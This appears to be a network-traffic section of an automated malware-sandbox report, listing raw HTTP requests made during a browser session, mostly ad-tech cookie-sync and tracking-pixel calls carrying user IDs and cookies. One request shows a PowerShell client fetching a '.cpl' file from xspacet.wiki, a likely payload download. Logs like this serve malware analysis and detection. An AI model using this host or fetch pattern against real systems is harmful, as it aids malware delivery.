Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11574&id=97dc38d56a HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: geo.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /visitor/bsync?name=risecode&uid=40a3c28f9ffc73ee86df2bac2d2bb390&url=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11609%26id%3D%5BBUYER_ID%5D%0A HTTP/1.1Host: visitor-risecode.omnitagjs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.2778489536815094 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ul_cb/check_uuid/https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Faid%3D11603%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26uid%3D$%7BBSW_UUID%7D HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?p=159706&gdpr=0&gdpr_consent=&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID&rdf=1 HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?aid=11600&id=1192333276257490180&gdpr=0&gdpr_consent= HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?gdpr=0&gdpr=0&gdpr_consent=&gdpr_consent=&p=160295&pu=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11576%26id%3D%23PMUID&rdf=1 HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /stein/ncpa.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: xspacet.wikiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ecm3?ex=onetag.com&id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4 HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/?int_id=98&uid=8561637051911725247&gdpr=0&gdpr_consent= HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match/?int_id=3&uid=cdc7338a7458e43b3b604d1e1bbecc8c&gdpr_consent=&gdpr=0 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match/?int_id=107&uid=8751746751128704325 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /ul_cb/sync?ssp=onetag&ssp_user_id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4&gdpr=0&gdpr_consent= HTTP/1.1Host: rtb.mfadsrvr.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /khaos.json? HTTP/1.1Host: token.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://eus.rubiconproject.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eus.rubiconproject.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11609&id=25ebd2f2d43075ee712bca45feb772f6 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /bh/rtset?pid=562985&ev=1&us_privacy=&rurl=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D149%26gdpr%3D0%26gdpr_consent%3D%26uid%3D%25%25VGUID%25%25 HTTP/1.1Host: bh.contextweb.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: VP=part_V22NFapzdQQi; pb_rtb_ev_part=3-1wje|8i8.0.1
Source: global trafficHTTP traffic detected: GET /cs?aid=11603&gdpr=[GDPR]&gdpr_consent=[USER_CONSENT]&uid= HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /user-sync?zone=176971&t=image&gdpr=0&gdpr_consent=&us_privacy=&r=https%3A%2F%2Fssp.disqus.com%2Fmatch%3Fbidder%3D27%26buyeruid%3D%7BUID%7D%26r%3DCid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgC HTTP/1.1Host: sync.adkernel.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?aid=11581&id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4 HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /match/bounce/current?version=1&networkId=72582&rurl=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D90%26gdpr%3D0%26gdpr_consent%3D%26uid%3D HTTP/1.1Host: prebid-match.dotomi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/?gdpr=0&gdpr_consent=&int_id=168&uid=OPUe4e9ec2f0e244e659552d959c8beec46 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match/?int_id=2&uid=M7A5IT3R-G-GNOQ&gdpr=0 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /ht/htw-pixel.gif?0 HTTP/1.1Host: cdn.indexww.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ssum-sec.casalemedia.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?ssp=onetag&gdpr=0&gdpr_consent=&user_id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4 HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/?int_id=106&google_error=3&gdpr=0&gdpr_consent= HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match/?int_id=19&google_error=3&gdpr=0&gdpr_consent= HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /pixel?&redir=https%3A%2F%2Fsync.adkernel.com%2Fuser-sync%3Fzone%3D176971%26dsp%3D763610%26t%3Dimage%26uid%3D%24UID HTTP/1.1Host: ap.lijit.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /6 HTTP/1.1Host: m.stripe.comConnection: keep-aliveContent-Length: 3408sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://m.stripe.networkSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://m.stripe.network/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/?int_id=149&gdpr=0&gdpr_consent=&uid=part_V22NFapzdQQi&ev=1&us_privacy=&pid=562985 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /pixel?&redir=https%3A%2F%2Fsync.adkernel.com%2Fuser-sync%3Fzone%3D176971%26dsp%3D763610%26t%3Dimage%26uid%3D%24UID&sovrn_retry=true HTTP/1.1Host: ap.lijit.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /user-sync?zone=176971&dsp=763610&t=image&uid= HTTP/1.1Host: sync.adkernel.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/bounce/current?DotomiTest=29ded5403b8504a3&is_secure=true&version=1&networkId=72582&rurl=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D90%26gdpr%3D0%26gdpr_consent%3D%26uid%3D HTTP/1.1Host: prebid-match.dotomi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
